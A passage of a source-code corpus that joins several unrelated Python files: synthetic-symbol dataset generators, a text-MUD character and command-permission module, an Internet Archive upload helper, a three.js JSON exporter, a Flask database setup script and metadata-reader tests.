return generate_counting_dataset(n_samples, scale_variation=0.1, n_symbols=n_symbols, seed=seed, **kwargs)
# for few-shot learning
# ---------------------
def all_chars(n_samples, seed=None, **kwarg):
"""Combines the symbols of all languages (up to 200 per languages).
Note: some fonts may appear rarely.
"""
symbols_list = []
for language in LANGUAGE_MAP.values():
alphabet = language.get_alphabet()
symbols = alphabet.symbols[:200]
logging.info("Using %d/%d symbols from alphabet %s", len(symbols), len(alphabet.symbols), alphabet.name)
symbols_list.extend(zip(symbols, [alphabet] * len(symbols)))
def attr_sampler(seed=None):
char, alphabet = symbols_list[np.random.choice(len(symbols_list))]
return basic_attribute_sampler(alphabet=alphabet, char=char)(seed)
return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_balanced_font_chars_dataset(n_samples, seed=None, **kwarg):
"""Samples uniformly from all fonts (max 200 per alphabet)
or uniformly from all symbols (max 200 per alphabet)
with probability 50%.
"""
font_list = []
symbols_list = []
for language in LANGUAGE_MAP.values():
alphabet = language.get_alphabet()
fonts = alphabet.fonts[:200]
symbols = alphabet.symbols[:200]
logging.info("Using %d/%d fonts from alphabet %s", len(fonts), len(alphabet.fonts), alphabet.name)
font_list.extend(zip(fonts, [alphabet] * len(fonts)))
logging.info("Using %d/%d symbols from alphabet %s", len(symbols), len(alphabet.symbols), alphabet.name)
symbols_list.extend(zip(symbols, [alphabet] * len(symbols)))
logging.info("Total n_fonts: %d, n_symbols: %d.", len(font_list), len(symbols_list))
def attr_sampler(seed=None):
if np.random.rand() > 0.5:
font, alphabet = font_list[np.random.choice(len(font_list))]
symbol = np.random.choice(alphabet.symbols[:200])
else:
symbol, alphabet = symbols_list[np.random.choice(len(symbols_list))]
font = np.random.choice(alphabet.fonts[:200])
return basic_attribute_sampler(char=symbol, font=font, is_bold=False, is_slant=False)(seed)
return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
# for active learning
# -------------------
def generate_large_translation(n_samples, language="english", seed=None, **kwarg):
"""Synbols are translated beyond the border of the image
to create a cropping effect. Scale is fixed to 0.5.
"""
attr_sampler = basic_attribute_sampler(
alphabet=LANGUAGE_MAP[language].get_alphabet(), scale=0.5, translation=lambda rng: tuple(rng.rand(2) * 4 - 2)
)
return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def missing_symbol_dataset(n_samples, language="english", seed=None, **kwarg):
"""With 10% probability, no symbols are drawn"""
def background(rng):
return MultiGradient(alpha=0.5, n_gradients=2, types=("linear", "radial"), seed=rand_seed(rng))
def tr(rng):
if rng.rand() > 0.1:
return tuple(rng.rand(2) * 2 - 1)
else:
return 10
attr_generator = basic_attribute_sampler(
alphabet=LANGUAGE_MAP[language].get_alphabet(), translation=tr, background=background
)
return dataset_generator(attr_generator, n_samples, dataset_seed=seed)
def generate_some_large_occlusions(n_samples, language="english", seed=None, **kwarg):
"""With probability 20%, add a large occlusion
over the existing symbol.
"""
def n_occlusion(rng):
if rng.rand() < 0.2:
return 1
else:
return 0
attr_sampler = add_occlusion(
basic_attribute_sampler(alphabet=LANGUAGE_MAP[language].get_alphabet()),
n_occlusion=n_occlusion,
scale=lambda rng: 0.6 * np.exp(rng.randn() * 0.1),
translation=lambda rng: tuple(rng.rand(2) * 6 - 3),
)
return dataset_generator(attr_sampler, n_samples, flatten_mask_except_first, dataset_seed=seed)
def generate_many_small_occlusions(n_samples, language="english", seed=None, **kwarg):
"""Add small occlusions on all images.
Number of occlusions are sampled uniformly in [0,5).
"""
attr_sampler = add_occlusion(
basic_attribute_sampler(alphabet=LANGUAGE_MAP[language].get_alphabet()),
n_occlusion=lambda rng: rng.randint(0, 5),
)
return dataset_generator(attr_sampler, n_samples, flatten_mask_except_first, dataset_seed=seed)
def generate_pixel_noise(n_samples, language="english", seed=None, **kwarg):
"""Add large pixel noise with probability 0.5."""
def pixel_noise(rng):
if rng.rand() > 0.1:
return 0
else:
return 0.3
attr_sampler = basic_attribute_sampler(
alphabet=LANGUAGE_MAP[language].get_alphabet(), pixel_noise_scale=pixel_noise
)
return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
# for font classification
# -----------------------
def less_variations(n_samples, language="english", seed=None, **kwarg):
"""Less variations in scale and rotations.
Also, no bold and no italic. This makes a more accessible font
classification task.
"""
attr_generator = basic_attribute_sampler(
alphabet=LANGUAGE_MAP[language].get_alphabet(),
is_bold=False,
is_slant=False,
scale=lambda rng: 0.5 * np.exp(rng.randn() * 0.1),
rotation=lambda rng: rng.randn() * 0.1,
)
return dataset_generator(attr_generator, n_samples, dataset_seed=seed)
DATASET_GENERATOR_MAP = {
"plain": generate_plain_dataset,
"default": generate_default_dataset,
"default-bw": generate_solid_bg_dataset,
"korean-1k": generate_korean_1k_dataset,
"camouflage": generate_camouflage_dataset,
"non-camou-bw": generate_non_camou_bw_dataset,
"non-camou-shade": generate_non_camou_shade_dataset,
"segmentation": generate_segmentation_dataset,
"counting": generate_counting_dataset,
"counting-fix-scale": generate_counting_dataset_scale_fix,
"counting-crowded": generate_counting_dataset_crowded,
"missing-symbol": missing_symbol_dataset,
"some-large-occlusion": generate_some_large_occlusions,
"many-small-occlusion": generate_many_small_occlusions,
"large-translation": generate_large_translation,
"tiny": generate_tiny_dataset,
"balanced-font-chars": generate_balanced_font_chars_dataset,
"all-chars": all_chars,
"less-variations": less_variations,
"pixel-noise": generate_pixel_noise,
"natural-patterns": generate_natural_images_dataset,
}
| 2.125 | 2 |
swampymud/character.py | ufosc/MuddySwamp | 10 | 12797400 | <reponame>ufosc/MuddySwamp
"""Module defining the CharacterClass metaclass and Character class,
which serves as the basis for all in-game characters.
This module also defines the 'Filter', used for CharacterClass-based
permissions systems, and 'Command', a wrapper that converts methods into
commands that can be invoked by characters.
"""
import enum
import functools
import inspect
import weakref
import asyncio
import swampymud.inventory as inv
from swampymud import util
from swampymud.util.shadowdict import ShadowDict
class Filter:
"""Filter for screening out certain CharacterClasses and Characters
_classes - set of CharacterClasses tracked by the filter
_include_chars - set characters to be included
_exclude_chars - set characters to be excluded
_mode - Filter.WHITELIST or Filter.BLACKLIST
if WHITELIST is selected, only characters whose class is in
_classes are allowed through the filter.
if BLACKLIST is selected, only characters whose class is NOT
in _classes are allowed through the filter.
Note that _include_chars / _exclude_chars take precedence over
the _classes. That is, if a WHITELIST includes the class
Wizard, but Bill the Wizard is in _exclude_chars, Bill will not
be permitted through the filter.
"""
class _FilterMode(enum.Enum):
"""Enum representing whether a filter includes or excludes the
classes that it tracks"""
WHITELIST = True
BLACKLIST = False
WHITELIST = _FilterMode.WHITELIST
BLACKLIST = _FilterMode.BLACKLIST
def __init__(self, mode, classes=(),
include_chars=(), exclude_chars=()):
"""initialize a Filter with [mode]
if [mode] is True, the Filter will act as a whitelist
if [mode] is False, the Filter will act as a blacklist
[classes] are those classes to be whitelisted/blacklisted
[include_chars] are specific characters to be included
[exclude_chars] are specific characters to be excluded
"""
self._classes = set(classes)
for char in include_chars:
if char in exclude_chars:
raise ValueError("Cannot have character in both include"
" and exclude")
for char in exclude_chars:
if char in include_chars:
raise ValueError("Cannot have character in both include"
" and exclude")
# store characters in a WeakSet, so that the Filter will not
# prevent them from getting garbage collected
self._include_chars = weakref.WeakSet(include_chars)
self._exclude_chars = weakref.WeakSet(exclude_chars)
if isinstance(mode, self._FilterMode):
self._mode = mode
elif isinstance(mode, bool):
if mode:
self._mode = Filter.WHITELIST
else:
self._mode = Filter.BLACKLIST
else:
if mode.lower() == "whitelist":
self._mode = Filter.WHITELIST
elif mode.lower() == "blacklist":
self._mode = Filter.BLACKLIST
else:
raise ValueError("Unrecognized mode %s" % repr(mode))
def permits(self, other):
"""returns True if Character/CharacterClass is allowed in
the individual Character is evaluated first,
then the Character's class, then all the Character's
ancestor classes
"""
if isinstance(other, Character):
if other in self._include_chars:
return True
elif other in self._exclude_chars:
return False
# now try the Character's class
other = type(other)
if isinstance(other, CharacterClass):
# cycle through each ancestor
ancestors = filter(lambda x: isinstance(x, CharacterClass),
other.__mro__)
for char_class in ancestors:
if char_class in self._classes:
return self._mode.value
# "other" is neither a CharClass nor Character
else:
return False
# the character / ancestors cannot be found in the list
return not self._mode.value
def include(self, other):
"""Set the filter to return 'True' if [other] is supplied
to permit()"""
# check that other is a Character / CharacterClass
if isinstance(other, CharacterClass):
if self._mode is Filter.WHITELIST:
self._classes.add(other)
else:
if other in self._classes:
self._classes.remove(other)
elif isinstance(other, Character):
if other in self._exclude_chars:
self._exclude_chars.remove(other)
self._include_chars.add(other)
else:
raise ValueError("Expected Character/CharacterClass,"
" received %s" % type(other))
def exclude(self, other):
"""Set the filter to return 'False' if [other] is supplied
to permit()"""
# check that other is a Character / CharacterClass
if isinstance(other, CharacterClass):
if self._mode == Filter.WHITELIST:
if other in self._classes:
self._classes.remove(other)
else:
self._classes.add(other)
elif isinstance(other, Character):
if other in self._include_chars:
self._include_chars.remove(other)
self._exclude_chars.add(other)
else:
raise ValueError("Expected Character/CharacterClass,"
f" received {type(other)}")
def __repr__(self):
"""overriding repr()"""
return "Filter({!r}, {!r}, {!r}, {!r})".format(
self._mode.value,
set(self._classes),
set(self._include_chars), set(self._exclude_chars)
)
@staticmethod
def from_dict(filter_dict):
"""returns a Filter pythonic representation [filter_dict]"""
return Filter(**filter_dict)
def to_dict(self):
"""returns a pythonic representation of this Filter"""
data = {"mode" : self._mode.value}
if self._classes:
data["classes"] = list(self._classes)
if self._include_chars:
data["include_chars"] = list(self._include_chars)
if self._exclude_chars:
data["exclude_chars"] = list(self._exclude_chars)
return data
class Command(functools.partial):
"""A subclass of functools.partial that supports equality.
The default implementation of functools.partial does not normally
support equality for mathematically sound reasons:
https://bugs.python.org/issue3564
With this class's equality operators, we aren't trying to solve an
undecidable problem, but just confirm that two partially-applied
functions have the same arguments and underlying functions.
Optional fields, "name", "label", and "field" are also provided.
These fields store player-relevant information that are NOT factored
into comparisons.
In addition, this class has a convenience method, '.specify' to
derive a new Command from an existing one by simply adding
additional arguments. All other information (base function, names,
etc.) will be propagated.
While you can update Command.keywords, avoid doing so.
All comparisons are based on the INITIAL keywords, so changing
keywords after initialization is unsupported.
"""
def __init__(self, *args, **kwargs):
"""initialize a Command like a functools.partial object"""
super().__init__()
# creating an immutable set of keywords for comparisons
self._keys = frozenset(self.keywords.items())
# propagate the name and doc from the base function
self.__name__ = self.func.__name__
self.__doc__ = self.func.__doc__
# try to clean the docstring, if one was provided
try:
self.__doc__ = inspect.cleandoc(self.__doc__)
except AttributeError:
pass
# initialize satellite data
self.name = None
self.label = None
# by default, add a filter that permits all (empty blacklist)
self.filter = Filter(Filter.BLACKLIST)
def __eq__(self, other):
"""Two commands are equal iff the base functions are equal,
the args are equal, and the (initial) keywords are equal"""
try:
return (self.func, self.args, self._keys) == \
(other.func, other.args, other._keys)
except AttributeError:
# other is not a Command
return False
def __hash__(self):
"""overriding hash"""
return hash((self.func, self.args, self._keys))
def specify(self, *newargs, **new_keywords) -> 'Command':
"""Derive a new version of this function by applying additional
arguments.
If a provided keyword argument conflicts with a prior argument,
the prior argument will be overriden.
"""
args = self.args + tuple(newargs)
keywords = self.keywords.copy()
keywords.update(new_keywords)
new_cmd = Command(self.func, *args, **keywords)
# propagate the name and source
new_cmd.name = self.name
new_cmd.label = self.label
# note that a new filter is not created, so any changes to the
# old NewCommand will change to the old Command, and visa versa
new_cmd.filter = self.filter
return new_cmd
def __str__(self):
"""returns the name of this command
if no name is provided, func.__name__ is used
"""
if self.name is None:
return self.func.__name__
return self.name
def help_entry(self) -> str:
"""return a help message for this command"""
if self.label is not None:
return f"{self} [from {self.label}]:\n{self.__doc__}"
return f"{self}:\n{self.__doc__}"
@staticmethod
def with_traits(name: str = None, label: str = None,
filter: Filter = None):
"""decorator to easily wrap a function additional traits
[name] = to invoke this Command, the Character must use [name]
instead of the function's name
[label] = the type of the command. (Affects help menu.)
[filter] = if provided, determine which Characters / Classes
are permitted to use this command. """
def decorator(func):
cmd = Command(func)
cmd.name = name
cmd.label = label
if filter is not None:
cmd.filter = filter
return cmd
return decorator
class CharacterClass(type):
"""metaclass establishing basic Character behaviors
CharacterClasses include the following important attributes:
- classname: how the class appears to the players
- frequency: how often will new players spawn as this class
- command_label: how commands from this class appear in help menu
"""
def __init__(cls, name, bases, namespace):
# add the proper name, if not already provided
if "classname" not in namespace:
cls.classname = util.camel_to_space(name)
# add a frequency field, if not already provided
if "frequency" not in namespace:
cls.frequency = 1
# add a "command_label", if not already provided
# this field is used in creating help menus
if "command_label" not in namespace:
cls.command_label = f"{cls} Commands"
# commands that were implemented for this class
cls._local_commands = {}
for value in namespace.values():
if isinstance(value, Command):
value.label = cls.command_label
cls._local_commands[str(value)] = value
# all commands, with the most recent commands exposed
cls._commands = {}
for base in reversed(cls.__mro__):
if not isinstance(base, CharacterClass):
continue
cls._commands.update(base._local_commands)
cls._commands.update(cls._local_commands)
# calling the super init
super().__init__(name, bases, namespace)
def __str__(cls):
"""overriding str to return classname"""
return cls.classname
class Character(metaclass=CharacterClass):
"""Base class for all other CharacterClasses"""
# How this class appears to players
classname = "Default Character"
# Starting location for this class
starting_location = None
# Commands from this class will be labeled "Default Commands"
command_label = "Default Commands"
# Valid equip slots for characters of this class
equip_slots = []
def __init__(self, name=None):
super().__init__()
self._name = name
self.location = None
self.msgs = asyncio.Queue()
# build dict from Commands collected by CharacterClass
self.cmd_dict = ShadowDict()
for (name, cmd) in self._commands.items():
cmd = cmd.specify(self)
# add command only if filter permits it
if cmd.filter.permits(self):
self.cmd_dict[name] = cmd
# because sCommands are not bound properly like a normal
# method, we must manually bind the methods
# TODO: override getattribute__ to solve the super() issue?
if isinstance(getattr(self, cmd.func.__name__), Command):
setattr(self, cmd.func.__name__, cmd)
# set up inventory and equipping items
self.inv = inv.Inventory()
self.equip_dict = inv.EquipTarget.make_dict(*self.equip_slots)
# put character in default command parsing mode
self._parser = self._command_parser
def message(self, msg):
"""send a message to the controller of this character"""
# place a
self.msgs.put_nowait(msg)
def command(self, msg):
"""issue 'msg' to character.
character will parse 'msg' using its current parser."""
if msg:
self._parser(msg)
def update(self):
"""periodically called method that updates character state"""
print(f"[{self}] received update")
def spawn(self, spawn_location):
"""Send a greeting to the character and put them into a
name-selection mode.
[spawn_location]: where the character should spawn after a name
is submitted.
"""
self.message(f"Welcome to our SwampyMud! You are a {type(self)}")
self.message(f"What should we call you?")
# set player location to spawn_location, but do not MOVE them
# thus, player will not be available to attack
self.location = spawn_location
self._parser = self._join_parser
def despawn(self):
"""method executed when a player dies"""
self.message("You died.")
if self.location is not None:
self.location.message(f"{self} died.", exclude={self})
try:
self.location.characters.remove(self)
except ValueError:
pass
self.location = None
self._parser = self._dead_parser
# default user-input parsers
def _join_parser(self, new_name: str):
"""Parser for a newly joined player, used for selecting a valid
name"""
if len(new_name) < 2:
self.message("Names must have at least 2 characters.")
return
if not new_name.isalnum():
self.message("Names must be alphanumeric.")
return
# TODO: perform some kind of check to prevent players
# from having the same name?
self._name = new_name
# move the player to the actual location they should be in
loc = self.location
self.location = None
self.set_location(loc)
self._parser = self._command_parser
def _command_parser(self, line: str):
"""The default parser for a player. Parses"""
# command is always the first word
args = line.split()
cmd_name = args[0]
if not cmd_name in self.cmd_dict:
self.message("Command \'%s\' not recognized." % cmd_name)
return
cmd = self.cmd_dict[cmd_name]
cmd(args)
def _dead_parser(self, line: str):
"""Parser used when a character has died"""
self.message("You have died. Reconnect to this server to start"
" as a new character.")
# string-formatting methods
def __repr__(self):
"""return a representation of Character"""
if self._name is None:
return f"{type(self).__name__}()"
return f"{type(self).__name__}(name={self})"
def __str__(self):
"""return the Character's name"""
if self._name:
return self._name
return "[nameless character]"
def view(self):
"""return a longer, user-focused depiction of Character"""
if self._name is None:
return f"A nameless {type(self)}"
return f"{self._name} the {type(self)}"
#location manipulation methods
def set_location(self, new_location):
"""sets location, updating the previous and new locations as
necessary and gathering commands from any entities in the
location
"""
try:
self.location.characters.remove(self)
# remove commands from all the entities
# in the current location
for entity in self.location.entities:
entity.on_exit(self)
entity.remove_cmds(self)
except AttributeError:
# location was none
pass
self.location = new_location
self.location.add_char(self)
# add commands from all the entities
# in the current locations
for entity in new_location.entities:
entity.on_enter(self)
entity.add_cmds(self)
#inventory/item related methods
def add_item(self, item, amt=1):
"""add [item] to player's inventory"""
# if the item is an ItemStack, unpack it first
if isinstance(item, inv.ItemStack):
self.inv.add_item(item.copy(), item.amount)
self.inv.add_item(item, amt)
def equip(self, item, from_inv=True):
"""place [item] in this player's equip dict
[item]: item to Equip
[from_inv]: if True, [item] should be removed from inventory
first. If item is not found in inventory, the command fails.
if False, [item] is not removed from inventory and will not
be returned to inventory upon unequip.
"""
# duck test that the item is even equippable
try:
target = item.target
except AttributeError:
self.message(f"{item} cannot be equipped.")
return
if target in self.equip_dict:
# check remove_inv, if true, remove item from inventory
# this avoids duplication
if from_inv:
try:
self.inv.remove_item(item)
# item not found
except KeyError:
self.message(f"Cannot equip {item}-"
"not found in inventory.")
return
# check for an already equipped weapon, unequip it
if self.equip_dict[target] is not None:
self.unequip(target)
item.on_equip(self)
item.add_cmds(self)
self.equip_dict[item.target] = item, from_inv
# class doesn't have an equip target for this item, cannot equip
else:
self.message(f"Cannot equip item {item} to {target}.")
return
def unequip(self, target):
"""updates this character's equip_dict such that the [target]
is set to None and any item at that position is unequipped
[target]: an EquipTarget"""
# test if anything is even equipped
# also duck test to see if this character even has [target]
# in its equip slots
try:
if self.equip_dict[target] is None:
self.message(f"No item equipped on target {target}.")
return
except KeyError:
self.message(f"{type(self)} does not possess"
f" equip slot '{target}'.")
return
equipped, from_inv = self.equip_dict[target]
equipped.on_unequip(self)
equipped.remove_cmds(self)
self.equip_dict[target] = None
# if item was from character's inventory, return it
if from_inv:
self.inv.add_item(equipped)
# default commands
@Command
def help(self, args):
"""Show relevant help information for a particular command.
usage: help [command]
If no command is supplied, a list of all commands is shown.
"""
if len(args) < 2:
# TODO: cache this or something
menu = self.help_menu()
self.message(menu)
else:
name = args[1]
try:
self.message(self.cmd_dict[name].help_entry())
except KeyError:
self.message(f"Command '{name}' not recognized.")
@Command
def look(self, args):
"""Gives a description of your current location.
usage: look
"""
# TODO: update to allow players to 'inspect' certain objects
self.message(self.location.view())
@Command
def say(self, args):
"""Send a message to all players in your current location.
usage: say [msg]
"""
msg = ' '.join(args[1:])
if msg and self.location is not None:
self.location.message(f"{self.view()}: {msg}")
@Command
def go(self, args):
"""Go to an accessible location.
usage: go [exit name]
"""
ex_name = " ".join(args[1:])
# Manually iterating over our location's list of exits
# Note! If writing your own method, just do
# util.find(location, ex_name, location.Exit, char=my_char)
# I'm only writing this to avoid a cyclic dependency.
for ex in self.location._exit_list:
if ex_name in ex.names:
found_exit = ex
break
else:
self.message(f"No exit with name '{ex_name}'.")
return
if found_exit.interact.permits(self):
old_location = self.location
new_location = found_exit.destination
new_location.message(f"{self} entered.")
self.set_location(new_location)
# TODO: only show the exit if a character can see it?
old_location.message(f"{self} left through exit "
f"'{ex_name}'.")
else:
if found_exit.perceive.permits(self):
self.message(f"Exit '{ex_name}' is inaccessible to you.")
# if the char can't see or interact with the exit,
# we lie to them and pretend like it doesn't exist
else:
self.message(f"No exit with name '{ex_name}'.")
@Command.with_traits(name="equip")
def cmd_equip(self, args):
"""Equip an equippable item from your inventory."""
if len(args) < 2:
self.message("Provide an item to equip.")
return
item_name = " ".join(args[1::]).lower()
found_items = util.find(self.inv, name=item_name)
if len(found_items) == 1:
self.equip(found_items[0][0])
elif len(found_items) > 1:
#TODO handle ambiguity
self.message(f"Ambigious item name. Results={found_items}")
else:
self.message(f"Could not find item '{item_name}'.")
@Command.with_traits(name="unequip")
def cmd_unequip(self, args):
"""Unequip an equipped item.
Usage: unequip [item]"""
if len(args) < 2:
self.message("Provide an item to equip.")
return
item_name = " ".join(args[1::]).lower()
# search through the items in the equip_dict
found_items = []
for _, equip_data in self.equip_dict.items():
if equip_data is None:
continue
item, _ = equip_data
if str(item).lower() == item_name:
found_items.append(item)
if len(found_items) == 1:
self.unequip(found_items[0].target)
elif len(found_items) > 1:
#TODO handle ambiguity
self.message(f"Ambigious item name. Results={found_items}")
else:
self.message(f"Could not find equipped item '{item_name}'.")
@Command
def pickup(self, args):
"""Pick up item from the environment."""
if len(args) < 2:
self.message("Provide an item to pick up.")
return
item_name = " ".join(args[1::]).lower()
# TODO: find a way to provide type=Item
found_items = util.find(self.location, name=item_name)
if len(found_items) == 1:
item = found_items[0][0]
self.location.inv.remove_item(item)
self.inv.add_item(item)
elif len(found_items) > 1:
#TODO handle ambiguity
self.message(f"Ambigious item name. Results={found_items}")
else:
self.message(f"Could not find item '{item_name}' to pick up.")
@Command
def drop(self, args):
"""Drop an item into the environment"""
if len(args) < 2:
self.message("Provide an item to drop.")
return
item_name = " ".join(args[1:]).lower()
found_items = util.find(self.inv, name=item_name)
if len(found_items) == 1:
item = found_items[0][0]
self.inv.remove_item(item)
self.location.inv.add_item(item)
elif len(found_items) > 1:
#TODO handle ambiguity
self.message(f"Ambigious item name. Results={found_items}")
else:
self.message(f"Could not find item '{item_name}' to drop.")
@Command.with_traits(name="inv")
def cmd_inv(self, args):
"""Show your inventory.
usage: inv"""
# create a string representation of the equipped items
equipped = []
for target, item in self.equip_dict.items():
if item is None:
equipped.append(f"{target}: none")
else:
equipped.append(f"{target}: {item[0]}")
equipped.sort()
self.message("\n".join(equipped))
inv_msg = self.inv.readable()
# only send a message if inv has items
if inv_msg:
self.message(inv_msg)
@Command.with_traits(name="use")
def cmd_use(self, args):
""" Use an item.
usage: use [item] [options for item]
Options may vary per item.
"""
# TODO: allow players to use accessible items in location?
if len(args) < 2:
self.message("Please specify an item.")
return
item_name = args[1]
found_items = util.find(self.inv, name=item_name)
if len(found_items) == 1:
item = found_items[0][0]
self.inv.remove_item(item)
item.on_use(self, args[2:])
# replace the item
self.inv.add_item(item)
elif len(found_items) > 1:
#TODO handle ambiguity
self.message(f"Ambigious item name. Results={found_items}")
else:
self.message(f"Could not find item '{item_name}' to use.")
# miscellaneous methods
def help_menu(self) -> str:
sources = {}
# walk the mro, to get the list of CharacterClasses in order
for cls in reversed(type(self).__mro__):
if isinstance(cls, CharacterClass):
sources[cls.command_label] = []
for name, cmd in self.cmd_dict.items():
try:
sources[cmd.label].append(name)
except KeyError:
sources[cmd.label] = [name]
# unpack the dictionary in reverse order
output = []
while sources:
source, names = sources.popitem()
output.append(f"---{source}---")
output.append(" ".join(names))
return "\n".join(output)
# serialization-related methods
@property
def symbol(self):
"""return a unique symbol for this Character"""
# failsafe to ensure that Character always has a symbol
# even if someone forgets to set self._symbol in the __init__
if not hasattr(self, "_symbol"):
symbol = "{}#{}".format(type(self).__name__,
util.to_base(id(self), 62))
setattr(self, "_symbol", symbol)
return self._symbol
@classmethod
def load(cls, data):
name = data["name"] if "name" in data else None
return cls(name)
def post_load(self, data):
pass
def save(self):
"""return a pythonic representation of this Character"""
return {"_type": type(self), "name": self._name}
def children(self):
"""pass"""
return []
#TODO: handle items here
| 2.171875 | 2 |
morphium/ia.py | pudo/morphium | 1 | 12797408 | <reponame>pudo/morphium
import os
import logging
import boto
from boto.s3.connection import OrdinaryCallingFormat
import mimetypes
from datetime import datetime
from morphium.util import env, TAG_LATEST
log = logging.getLogger(__name__)
config = {}
class InternetArchive(object):
"""A scraper archive on the internet archive. This is called when a
scraper has generated a file which needs to be backed up to a
bucket."""
def __init__(self, item=None, prefix=None):
self.tag = datetime.utcnow().date().isoformat()
self.item = item or env('ia_item')
self.prefix = prefix
self.access_key = env('ia_access_key_id')
self.secret_key = env('ia_secret_access_key')
@property
def bucket(self):
if not hasattr(self, '_bucket'):
config = self.item is not None
config = config and self.access_key is not None
config = config and self.secret_key is not None
if not config:
log.warning("No Internet Archive config, skipping upload.")
self._client = None
return None
conn = boto.connect_s3(self.access_key, self.secret_key,
host='s3.us.archive.org',
is_secure=False,
calling_format=OrdinaryCallingFormat())
if not conn.lookup(self.item, validate=False):
conn.create_bucket(self.item)
self._bucket = conn.get_bucket(self.item)
return self._bucket
def upload_file(self, source_path, file_name=None, mime_type=None):
"""Upload a file to the given bucket."""
if self.bucket is None:
return
if file_name is None:
file_name = os.path.basename(source_path)
if mime_type is None:
mime_type, _ = mimetypes.guess_type(file_name)
mime_type = mime_type or 'application/octet-stream'
date_name = os.path.join(self.tag, file_name)
copy_name = os.path.join(TAG_LATEST, file_name)
for key_name in (date_name, copy_name):
if self.prefix is not None:
key_name = os.path.join(self.prefix, key_name)
log.info("Uploading [%s]: %s", self.item, key_name)
key = self.bucket.get_key(key_name)
if key is None:
key = self.bucket.new_key(key_name)
key.content_type = mime_type
key.set_contents_from_filename(source_path,
policy='public-read')
return key.generate_url(84600, query_auth=False)
| 1.609375 | 2 |
ThreeJson.py | The-Fonz/freecad-parametric-generator | 11 | 12797416 | #
# Adapted from https://github.com/dcowden/cadquery/blob/master/cadquery/freecad_impl/exporters.py
# Objects that represent
# three.js JSON object notation
# https://github.com/mrdoob/three.js/wiki/JSON-Model-format-3
#
JSON_TEMPLATE= """\
{
"metadata" :
{
"formatVersion" : 3,
"generatedBy" : "ParametricParts",
"vertices" : %(nVertices)d,
"faces" : %(nFaces)d,
"normals" : 0,
"colors" : 0,
"uvs" : 0,
"materials" : 1,
"morphTargets" : 0
},
"scale" : 1.0,
"materials": [ {
"DbgColor" : 15658734,
"DbgIndex" : 0,
"DbgName" : "Material",
"colorAmbient" : [0.0, 0.0, 0.0],
"colorDiffuse" : [0.6400000190734865, 0.10179081114814892, 0.126246120426746],
"colorSpecular" : [0.5, 0.5, 0.5],
"shading" : "Lambert",
"specularCoef" : 50,
"transparency" : 1.0,
"vertexColors" : false
}],
"vertices": %(vertices)s,
"morphTargets": [],
"normals": [],
"colors": [],
"uvs": [[]],
"faces": %(faces)s
}
"""
def tessToJson( vert, face, nvert, nface):
'''Specify compatible lists of vertices and faces,
and get a three.js JSON object back. Note: list of face indices
must be compatible, i.e. lead with 0 for each row of 3 indices
to create a triangle. Spec:
https://github.com/mrdoob/three.js/wiki/JSON-Model-format-3'''
return JSON_TEMPLATE % {
'vertices' : str(vert),
'faces' : str(face),
'nVertices': nvert,
'nFaces' : nface
}; | 1.804688 | 2 |
orm.py | macTracyHuang/cs50w_project1 | 0 | 12797424 | import os
from flask import Flask
from application import get_app
from models import *
from flask_session import Session
app = get_app()
session = Session(app)
# Tell Flask what SQLAlchemy databas to use.
# app.config["SQLALCHEMY_DATABASE_URI"] = "postgresql://postgres:a1234567@localhost"
# app.config["SQLALCHEMY_DATABASE_URI"] = os.getenv("DATABASE_URL")
# app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
# Link the Flask app with the database (no Flask app is actually being run yet).
db.init_app(app)
def main():
Create tables based on each table definition in `models`
db.drop_all()
db.create_all()
session.app.session_interface.db.create_all()
if __name__ == "__main__":
# Allows for command line interaction with Flask application
with app.app_context():
main()
| 1.539063 | 2 |
tests/reader/test_iso19139.py | cehbrecht/md-ingestion | 4 | 12797432 | <reponame>cehbrecht/md-ingestion<gh_stars>1-10
import os
import pytest
from mdingestion.reader import ISO19139Reader
from tests.common import TESTDATA_DIR
def test_envidat_iso19139():
point_file = os.path.join(
TESTDATA_DIR, 'envidat-iso19139', 'SET_1', 'xml', 'bbox_2ea750c6-4354-5f0a-9b67-2275d922d06f.xml')
reader = ISO19139Reader()
doc = reader.read(point_file)
assert 'Number of avalanche fatalities' in doc.title[0]
assert 'Avalanche Warning Service SLF' in doc.creator[0]
assert 'WSL Institute for Snow' in doc.publisher[0]
assert '2018' == doc.publication_year
assert ['AVALANCHE ACCIDENT STATISTICS', 'AVALANCHE ACCIDENTS', 'AVALANCHE FATALITIES'] == doc.keywords
# assert "POLYGON ((45.81802 10.49203, 45.81802 47.80838, 5.95587 47.80838, 5.95587 10.49203, 45.81802 10.49203))" == doc.spatial_coverage # noqa
# assert "{'type': 'Polygon', 'coordinates': (((45.81802, 10.49203), (45.81802, 47.80838), (5.95587, 47.80838), (5.95587, 10.49203), (45.81802, 10.49203)),)}" == doc.spatial # noqa
# assert '2018-12-31T00:00:00Z' == doc.temporal_coverage_begin_date
# assert '2018-12-31T00:00:00Z' == doc.temporal_coverage_end_date
def test_boundingbox():
point_file = os.path.join(
TESTDATA_DIR, 'deims', 'raw', '8708dd68-f413-5414-80fb-da439a4224f9.xml')
reader = ISO19139Reader()
doc = reader.read(point_file)
# <gmd:westBoundLongitude>
# <gco:Decimal>34.611499754704</gco:Decimal>
# </gmd:westBoundLongitude>
# <gmd:eastBoundLongitude>
# <gco:Decimal>35.343095815055</gco:Decimal>
# </gmd:eastBoundLongitude>
# <gmd:southBoundLatitude>
# <gco:Decimal>29.491402811787</gco:Decimal>
# </gmd:southBoundLatitude>
# <gmd:northBoundLatitude>
# <gco:Decimal>30.968572510749</gco:Decimal>
# </gmd:northBoundLatitude>
assert '(34.611W, 29.491S, 35.343E, 30.969N)' == doc.spatial_coverage
@pytest.mark.xfail(reason='missing in reader')
def test_iso19139_temporal_coverage():
point_file = os.path.join(
TESTDATA_DIR, 'envidat-iso19139', 'SET_1', 'xml', 'bbox_2ea750c6-4354-5f0a-9b67-2275d922d06f.xml')
reader = ISO19139Reader()
doc = reader.read(point_file)
# assert "POLYGON ((45.81802 10.49203, 45.81802 47.80838, 5.95587 47.80838, 5.95587 10.49203, 45.81802 10.49203))" == doc.spatial_coverage # noqa
# assert "{'type': 'Polygon', 'coordinates': (((45.81802, 10.49203), (45.81802, 47.80838), (5.95587, 47.80838), (5.95587, 10.49203), (45.81802, 10.49203)),)}" == doc.spatial # noqa
assert '2018-12-31T00:00:00Z' == doc.temporal_coverage_begin_date
assert '2018-12-31T00:00:00Z' == doc.temporal_coverage_end_date
